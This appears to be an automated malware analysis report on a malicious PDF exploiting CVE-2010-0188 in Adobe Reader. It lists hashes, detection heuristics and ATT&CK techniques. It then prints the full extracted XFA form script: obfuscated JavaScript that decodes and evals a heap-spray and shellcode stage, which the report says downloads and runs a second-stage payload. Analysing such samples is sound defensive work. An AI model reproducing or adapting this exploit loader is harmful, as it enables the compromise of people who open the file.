Malicious PDF — malware analysis report

Static analysis result for SHA-256 01dfb86782ba0958…

MALICIOUS

PDF

12.9 KB First seen: 2026-05-08
MD5: 96d3a299293c7c22ea247e78dca920c2 SHA-1: fec221a73c3393439b3b3dd4101ac045e472c612 SHA-256: 01dfb86782ba09581278f8ef720ee64996990994007e38169a4ff125489e0ecb
366 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains XFA (XML Forms Architecture) content that triggers a heap spray exploit targeting CVE-2010-0188 in Adobe Reader. Embedded JavaScript within the XFA form is responsible for executing this exploit. The script's primary function is to download and execute a second-stage payload, although the exact URL is obfuscated within the script.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 12

  • Adobe Reader LibTIFF XFA image exploit — CVE-2010-0188 critical CVE likely CVE_2010_0188
    PDF contains the CVE-2010-0188 exploit template: XFA JavaScript heap-spray setup, a generated TIFF image payload, and assignment of that TIFF data to an XFA image field rawValue to trigger Adobe Reader's LibTIFF parser.
  • XFA form contains risky executable script high CVE related PDF_XFA_SCRIPT
    PDF embeds an XFA form whose script block contains exploit, submission/launch, or shell-execution primitives. Ordinary LiveCycle print/update scripts are left as generic XFA/JS signals unless stronger behavior is present.
  • ClamAV: Pdf.Exploit.Agent-36755 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36755
  • XFA JavaScript heap-spray exploit code critical PDF_XFA_HEAP_SPRAY
    PDF contains XFA script content with heap-spray or shellcode-like JavaScript markers such as large encoded word sequences, util.pack, large arrays, or spray variable names. This is a weaponised Adobe Reader exploit pattern, not a normal interactive form.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Malformed active-content stream length medium PDF_MALFORMED_EXPLOIT_STREAM_LENGTH
    A PDF stream that carries active/exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are common parser-evasion/supporting evidence around Reader exploit streams.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • AcroForm button with action trigger low PDF_ACROFORM_BUTTON
    PDF contains a /Btn form field together with a SubmitForm/URI/Launch/JS trigger — this is the building block of fake 'Download' or 'Open' button overlays used in PDF phishing lures
  • Embedded script payload in PDF stream info PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives — common in accessible XFA forms but worth surfacing for analyst review.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xdp/ In PDF document text
    • http://www.xfa.org/schema/xfa-template/2.5In PDF document text
    • http://www.xfa.org/schema/xfa-data/1.0In PDF document text

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
embedded_pdf_script_000003e2.bin pdf-embedded-script PDF raw stream script payload at offset 0x3E2 12194 bytes
SHA-256: 5d3901f8867e95bd6daa686fa52a1c0de62799fa1da7ec90c02078be63129e59
Preview script
First 1,000 lines of the extracted script
<xdp:xdp xmlns:xdp='http://ns.adobe.com/xdp/'>
<asd/>as<config><asd/>
<present>
<pdf
>
<int>0</int>
<interactive>&#000049;</interactive>
a
<asd/>a<version>
1.5</version>
a<asd/>
</pdf>
</present>
<asd/></config><asd/>
<template xmlns='http://www.xfa.org/schema/xfa-template/2.5'>
<asd/>
a<subform name="a1">		<pageSet>
			<pageArea id="roteYom" name="roteYom">
				<contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/>
				<medium long="792pt" short="612pt" stock="default"/>
			</pageArea>
		</pageSet>
<asd/>a
		<subform name='v236536b346b'>
		a<asd/>a<field name='qwe123b'>a<asd/>a<event asd='wqr' activity='initialize'>
a<asd></asd><script
contentType='application/x-javascript'>

m=1-1;
cc="aF{p8hIS([Q76d3lbwAqE19?V&lt;y=\"kWj^;]c:rR ut)C5Lx%/4U+v'm,.DeB*oK-iMYng20s}f_";
x='efv5';
q=x[0]+'val';
a=(Number+Number).substr(2,3);
aa=([].sort+[].sort).substr(2,3);
if (a===aa){
t='214124';
e=t['indexOf'];
&#000119;=e(12)[q];
s=new Array();
ss='split';
ar='52@0@37@39@3@0@13@13@64@67@68@33@52@0@37@39@16@16@16@55@39@35@35@35@55@39@13@13@13@55@39@58@58@58@55@39@73@73@73@55@39@68@68@68@55@39@5@5@5@33@52@0@37@39@3@61@64@67@41@58@37@71@74@0@55@39@64@33@52@0@37@39@46@39@27@39@67@58@17@39@18@37@37@0@26@8@42@33@52@0@37@39@26@39@27@39@67@58@17@39@18@37@37@0@26@8@42@33@52@0@37@39@74@15@21@27@28@49@35@69@70@12@70@70@73@70@44@21@11@4@70@49@0@14@35@69@70@12@70@70@73@70@73@12@14@4@70@49@0@0@14@58@16@4@70@49@0@14@70@69@70@4@69@49@0@12@58@69@73@4@70@49@0@49@21@49@21@49@21@49@21@69@12@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@21@69@14@22@4@70@49@0@12@49@69@70@12@70@70@73@70@70@70@49@70@70@70@70@49@21@49@21@49@21@49@21@49@21@49@21@49@21@49@21@12@12@4@14@58@49@73@35@73@35@4@44@58@49@11@44@14@49@58@22@44@73@14@14@35@70@12@49@4@16@49@70@14@70@4@16@49@70@70@35@4@16@11@70@21@35@44@12@4@16@11@12@70@4@14@14@13@16@12@12@4@16@44@58@14@35@70@14@11@49@14@14@69@35@4@21@58@58@21@44@21@70@73@73@73@73@16@4@4@16@49@70@14@70@35@14@49@12@14@22@70@12@11@44@73@16@4@11@14@49@69@49@4@44@58@49@11@44@44@21@58@22@58@16@49@35@44@21@44@12@4@16@11@44@14@35@4@16@11@49@14@44@11@4@70@14@73@44@44@12@4@16@11@12@69@70@70@14@73@44@14@14@35@22@49@22@49@21@73@35@0@13@70@14@35@44@14@14@13@16@70@73@16@58@21@70@14@4@73@69@11@49@70@4@35@21@35@16@70@13@70@14@13@0@49@70@58@16@73@21@14@16@21@73@11@44@58@12@44@58@4@16@44@58@69@49@70@14@13@13@12@12@4@16@70@35@49@16@4@13@49@12@58@35@73@73@44@49@69@49@70@35@4@16@13@4@70@14@13@13@4@16@70@49@4@16@70@14@35@44@0@16@44@58@44@22@35@14@58@16@44@14@0@13@4@16@12@4@69@70@4@70@11@13@70@35@14@14@11@49@70@14@22@12@58@16@73@14@4@16@12@4@70@4@4@16@73@11@12@0@70@44@44@22@58@4@22@4@73@73@73@73@73@73@58@69@73@22@58@4@70@70@70@70@70@70@70@70@44@4@44@70@12@0@49@70@12@4@73@73@70@70@70@70@70@70@44@70@4@14@35@70@21@22@44@70@44@44@4@16@58@35@4@16@44@58@21@70@4@14@35@14@70@44@73@73@58@14@12@4@12@73@12@58@70@70@70@70@12@4@11@44@11@69@12@35@12@13@44@49@73@73@21@12@4@14@35@49@70@4@4@16@58@4@58@4@12@21@73@73@73@73@73@73@58@16@70@69@58@16@11@69@4@21@58@35@70@49@70@21@70@70@70@70@4@13@44@35@69@49@70@35@35@11@70@49@69@49@11@69@12@44@12@11@11@14@35@11@49@49@69@49@70@49@11@12@11@69@14@14@14@69@35@11@49@49@69@49@70@4@69@70@69@13@11@14@69@70@44@14@12@4@73@4@70@70@70@70@70@70@73@73@44@12@70@35@4@16@58@4@14@14@35@22@44@21@35@11@49@49@21@13@70@70@11@11@11@70@12@69@11@49@35@11@49@49@21@13@70@44@69@58@12@49@12@35@12@35@35@12@49@49@21@13@70@22@70@70@44@22@4@0@35@21@70@49@14@70@4@4@49@49@21@13@70@49@49@21@44@21@12@0@70@70@12@0@70@70@44@14@44@11@12@0@70@70@73@73@44@12@21@49@4@44@35@70@11@44@21@12@12@0@70@70@44@14@73@73@44@12@70@49@12@0@70@70@4@14@58@16@70@35@44@14@73@73@44@12@70@49@4@14@35@14@70@35@58@16@70@69@58@16@21@14@49@11@4@70@14@73@70@70@11@44@73@0@49@11@4@70@14@73@70@70@11@44@35@49@12@0@70@70@12@0@73@58@73@73@44@12@70@4@58@4@22@35@73@58@73@73@73@73@4@58@49@58@70@58@58@35@22@4@73@58@4@0@70@58@4@22@12@73@70@21@16@13@14@14@35@0@4@0@44@16@21@16@35@12@49@12@11@22@14@12@21@0@69@73@11@70@12@4@11@49@11@49@11@70@14@0@69@73@69@73@14@21@14@4@14@49@69@58@14@4@14@69@69@58@14@21@14@21@14@12@69@58@14@14@14@22@69@73@11@11@69@58@11@70@12@4@11@70@14@73@12@12@14@13@14@70@69@12@12@44@14@13@14@49@70@70@70@70@28@33@52@0@37@39@74@15@69@27@28@49@35@69@70@12@70@70@73@0@44@12@14@4@70@49@0@14@35@69@70@12@70@70@73@22@12@69@21@4@70@49@0@22@70@21@73@4@70@49@0@14@70@22@70@4@49@49@0@11@13@11@58@4@70@49@0@49@21@49@21@49@21@49@21@69@12@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@11@21@4@4@4@70@49@0@12@49@69@70@12@70@70@73@70@70@70@49@70@70@70@70@49@21@49@21@49@21@49@21@49@21@49@21@49@21@49@21@12@12@4@14@58@49@73@35@73@35@4@44@58@49@11@44@14@49@58@22@44@73@14@14@35@70@12@49@4@16@49@70@14@70@4@16@49@70@70@35@4@16@11@70@21@35@44@12@4@16@11@12@70@4@14@14@13@16@12@12@4@16@44@58@14@35@70@14@11@49@14@14@69@35@4@21@58@58@21@44@21@70@73@73@73@73@16@4@4@16@49@70@14@70@35@14@49@12@14@22@70@12@11@44@73@16@4@11@14@49@69@49@4@44@58@49@11@44@44@21@58@22@58@16@49@35@44@21@44@12@4@16@11@44@14@35@4@16@11@49@14@44@11@4@70@14@73@44@44@12@4@16@11@12@69@70@70@14@73@44@14@14@35@22@49@22@49@21@73@35@0@13@70@14@35@44@14@14@13@16@70@73@16@58@21@70@14@4@73@69@11@49@70@4@35@21@35@16@70@13@70@14@13@0@49@70@58@16@73@21@14@16@21@73@11@44@58@12@44@58@4@16@44@58@69@49@70@14@13@13@12@12@4@16@70@35@49@16@4@13@49@12@58@35@73@73@44@49@69@49@70@35@4@16@13@4@70@14@13@13@4@16@70@49@4@16@70@14@35@44@0@16@44@58@44@22@35@14@58@16@44@14@0@13@4@16@12@4@69@70@4@70@11@13@70@35@14@14@11@49@70@14@22@12@58@16@73@14@4@16@12@4@70@4@4@16@73@11@12@0@70@44@44@22@58@4@22@4@73@73@73@73@73@73@58@69@73@22@58@4@70@70@70@70@70@70@70@70@44@4@44@70@12@0@49@70@12@4@73@73@70@70@70@70@70@70@44@70@4@14@35@70@21@22@44@70@44@44@4@16@58@35@4@16@44@58@21@70@4@14@35@14@70@44@73@73@58@14@12@4@12@73@12@58@70@70@70@70@12@4@11@44@11@69@12@35@12@13@44@49@73@73@21@12@4@14@35@49@70@4@4@16@58@4@58@4@12@21@73@73@73@73@73@73@58@16@70@69@58@16@11@69@4@21@58@35@70@49@70@21@70@70@70@70@4@13@44@35@69@49@70@35@35@11@70@49@69@49@11@69@12@44@12@11@11@14@35@11@49@49@69@49@70@49@11@12@11@69@14@14@14@69@35@11@49@49@69@49@70@4@69@70@69@13@11@14@69@70@44@14@12@4@73@4@70@70@70@70@70@70@73@73@44@12@70@35@4@16@58@4@14@14@35@22@44@21@35@11@49@49@21@13@70@70@11@11@11@70@12@69@11@49@35@11@49@49@21@13@70@44@69@58@12@49@12@35@12@35@35@12@49@49@21@13@70@22@70@70@44@22@4@0@35@21@70@49@14@70@4@4@49@49@21@13@70@49@49@21@44@21@12@0@70@70@12@0@70@70@44@14@44@11@12@0@70@70@73@73@44@12@21@49@4@44@35@70@11@44@21@12@12@0@70@70@44@14@73@73@44@12@70@49@12@0@70@70@4@14@58@16@70@35@44@14@73@73@44@12@70@49@4@14@35@14@70@35@58@16@70@69@58@16@21@14@49@11@4@70@14@73@70@70@11@44@73@0@49@11@4@70@14@73@70@70@11@44@35@49@12@0@70@70@12@0@73@58@73@73@44@12@70@4@58@4@22@35@73@58@73@73@73@73@4@58@49@58@70@58@58@35@22@4@73@58@4@0@70@58@4@22@12@73@70@21@16@13@14@14@35@0@4@0@44@16@21@16@35@12@49@12@11@22@14@12@21@0@69@73@11@70@12@4@11@49@11@49@11@70@14@0@69@73@69@73@14@21@14@4@14@49@69@58@14@4@14@69@69@58@14@21@14@21@14@12@69@58@14@14@14@22@69@73@11@11@69@58@11@70@12@4@11@70@14@73@12@12@14@13@14@70@69@12@12@44@14@13@14@49@70@70@70@70@28@33@74@15@14@27@0@3@3@33@74@15@49@27@67@58@17@39@18@37@37@0@26@8@42@33@73@40@67@35@41@64@61@67@39@74@15@44@8@42@2@52@0@37@39@74@15@12@27@74@15@14@56@52@64@58@17@58@37@24@58@37@71@64@61@67@56@41@61@7@41@37@64@67@68@8@42@33@74@15@12@27@74@15@12@56@37@58@3@15@0@35@58@8@53@56@53@55@53@53@42@33@17@5@64@15@58@8@74@15@12@56@15@58@67@68@41@5@25@49@42@74@15@12@51@27@53@70@53@33@37@58@41@40@37@67@39@3@0@37@71@58@6@67@41@8@74@15@12@55@21@70@42@72@73@40@67@35@41@64@61@67@39@74@15@11@8@74@15@4@55@74@15@22@42@2@17@5@64@15@58@8@74@15@4@56@15@58@67@68@41@5@60@69@25@74@15@22@42@74@15@4@51@27@74@15@4@33@37@58@41@40@37@67@39@74@15@4@56@71@40@16@71@41@37@64@67@68@8@70@55@74@15@22@48@69@42@72@73@40@67@35@41@64@61@67@39@74@6@70@8@74@6@21@42@2@74@6@21@27@40@67@58@71@35@0@3@58@8@74@6@21@42@33@37@61@41@58@57@0@29@27@74@6@21@56@15@58@67@68@41@5@60@69@33@13@0@29@38@61@41@58@27@40@67@58@71@35@0@3@58@8@53@47@40@22@70@22@70@53@42@33@71@3@37@0@26@27@74@15@11@8@13@0@29@38@61@41@58@55@70@46@69@70@70@70@63@37@61@41@58@57@0@29@42@33@15@61@46@30@5@58@58@27@74@6@21@51@71@3@37@0@26@33@15@61@46@30@5@58@58@27@74@15@11@8@15@61@46@30@5@58@58@55@44@69@49@70@22@4@42@33@73@61@37@8@64@27@70@33@39@64@39@25@39@49@70@70@33@39@64@51@51@42@74@15@49@9@64@34@27@15@61@46@30@5@58@58@56@71@40@16@71@41@37@8@70@55@15@61@46@30@5@58@58@56@15@58@67@68@41@5@63@21@42@51@13@0@29@38@61@41@58@33@72@73@40@67@35@41@64@61@67@39@74@6@69@8@74@6@21@55@15@58@67@42@2@17@5@64@15@58@8@74@6@21@56@15@58@67@68@41@5@25@15@58@67@42@74@6@21@51@27@74@6@21@33@37@58@41@40@37@67@39@74@6@21@56@71@40@16@71@41@37@64@67@68@8@70@55@15@58@67@42@72@73@40@67@35@41@64@61@67@39@74@6@14@8@74@6@21@42@2@37@58@41@27@53@53@33@73@61@37@8@64@27@70@33@64@25@74@6@21@56@15@58@67@68@41@5@33@64@51@27@69@42@2@16@27@74@6@21@56@71@40@16@71@41@37@8@64@55@69@42@33@35@27@3@0@37@71@58@6@67@41@8@16@55@21@12@42@33@37@58@41@51@27@7@41@37@64@67@68@56@73@37@61@54@43@5@0@37@43@61@13@58@8@35@42@33@72@37@58@41@40@37@67@39@37@58@41@72@73@40@67@35@41@64@61@67@39@74@31@64@21@8@74@6@21@55@74@6@49@42@2@74@6@44@27@53@53@33@73@61@37@8@74@6@12@27@70@33@74@6@12@25@74@6@21@56@15@58@67@68@41@5@33@74@6@12@51@51@42@2@74@15@22@27@74@6@49@56@15@58@67@68@41@5@33@74@6@11@27@74@6@21@56@35@5@0@37@43@61@13@58@18@41@8@74@6@12@42@33@74@6@4@27@74@6@49@56@35@5@0@37@43@61@13@58@18@41@8@74@6@12@47@74@15@22@42@33@74@6@44@51@27@7@41@37@64@67@68@56@73@37@61@54@43@5@0@37@43@61@13@58@8@74@6@11@32@74@6@4@42@33@72@37@58@41@40@37@67@39@74@6@44@72@73@40@67@35@41@64@61@67@39@74@6@22@8@74@6@12@42@2@74@31@70@27@74@6@12@56@41@61@7@41@37@64@67@68@8@21@12@42@33@74@31@21@27@74@31@70@56@15@58@67@68@41@5@33@74@6@44@27@8@74@31@21@47@69@42@23@53@70@53@51@74@31@70@36@74@31@70@33@37@58@41@40@37@67@39@74@6@44@72@73@40@67@35@41@64@61@67@39@74@31@69@8@74@6@21@42@2@74@6@44@27@53@53@33@73@61@37@8@74@6@12@27@70@33@74@6@12@25@74@6@21@56@15@58@67@68@41@5@33@74@6@12@51@27@69@42@2@74@6@44@51@27@53@47@40@53@33@74@6@44@51@27@74@6@22@8@74@6@21@56@35@5@0@37@43@61@13@58@18@41@8@74@6@12@51@21@42@42@33@74@6@44@51@27@74@6@22@8@74@6@21@56@35@5@0@37@43@61@13@58@18@41@8@74@6@12@42@42@72@37@58@41@40@37@67@39@74@6@44@72@73@40@67@35@41@64@61@67@39@74@31@14@8@42@2@74@31@49@27@74@15@44@8@42@33@64@73@8@74@31@49@25@22@70@70@70@42@2@74@31@44@27@53@61@51@40@18@7@31@68@68@68@29@3@40@45@49@59@62@48@48@48@48@48@17@18@18@18@18@59@18@18@18@18@18@18@18@18@18@18@18@18@10@18@18@18@18@18@18@18@18@73@5@0@18@7@64@18@68@66@18@22@4@20@6@59@62@53@33@74@31@12@27@74@15@21@33@74@31@11@27@74@6@14@8@74@31@12@42@72@58@15@71@58@2@74@31@44@27@53@29@59@51@18@7@31@64@10@5@20@3@22@73@61@59@62@48@48@48@48@48@17@18@18@18@18@59@18@18@18@18@18@18@18@18@18@18@18@18@10@18@18@18@18@18@18@18@18@66@46@43@18@7@64@18@68@66@18@48@73@20@49@59@62@53@33@74@31@12@27@74@15@69@33@74@31@11@27@74@6@14@8@74@31@12@42@72@74@31@4@27@53@7@50@29@19@18@57@68@68@18@18@59@59@53@33@74@31@22@27@74@6@69@8@53@10@50@1@59@53@55@21@70@22@4@49@42@33@74@15@15@70@27@53@10@10@35@18@18@18@20@57@18@18@20@18@18@18@18@17@6@18@18@18@18@10@20@57@18@18@20@18@18@18@18@59@18@18@18@18@18@17@20@57@18@18@20@18@18@18@18@59@18@18@18@18@59@68@20@57@18@18@20@18@18@18@18@59@18@18@18@18@20@10@20@20@18@18@20@18@18@18@18@6@18@18@18@18@1@17@20@20@18@18@20@18@18@18@18@17@6@18@18@18@50@18@20@57@18@65@17@18@18@18@43@7@6@18@18@18@18@18@18@18@18@18@18@65@57@18@31@48@48@48@48@48@53@33@74@15@15@21@27@74@31@4@51@74@31@22@51@74@15@15@70@51@74@31@44@33@74@15@15@69@27@74@31@64@21@8@74@31@11@55@53@53@42@33@64@73@8@74@15@15@69@56@15@58@67@68@41@5@47@69@42@74@15@15@69@51@27@40@67@58@71@35@0@3@58@8@53@47@70@70@53@42@33@74@15@15@14@27@74@31@69@8@74@15@15@69@42@33@17@64@41@5@8@2@29@36@74@15@15@14@72@42@74@6@70@8@29@42@33@19@17@58@21@69@14@16@56@37@0@17@24@0@15@40@58@27@74@15@15@21@72@74@31@14@8@42@33';
if(1)ar=ar.split('@');
}
&#110;=cc;
for(i=0;i&lt;ar.length;i++){
s[i]=n[ar[i]];
}
w(s&#46;join(''));

</script>a<asd/>b</event>
<asd/>a<ui>b
<asd/>a
<imageEdit qwe='qwe'/>
<asd/>a
</ui>
</field>
<asd/>a
</subform>
</subform><Gsdg/>a</template>a<asd/>a<xfa:datasets a='a' xmlns:xfa='http://www.xfa.org/schema/xfa-data/1.0' b='b'>
<xfa:data><a1 test="123">
</a1>
</xfa:data>
</xfa:datasets>
</xdp:xdp>

Open this report in the interactive analyzer, or submit your own file for analysis.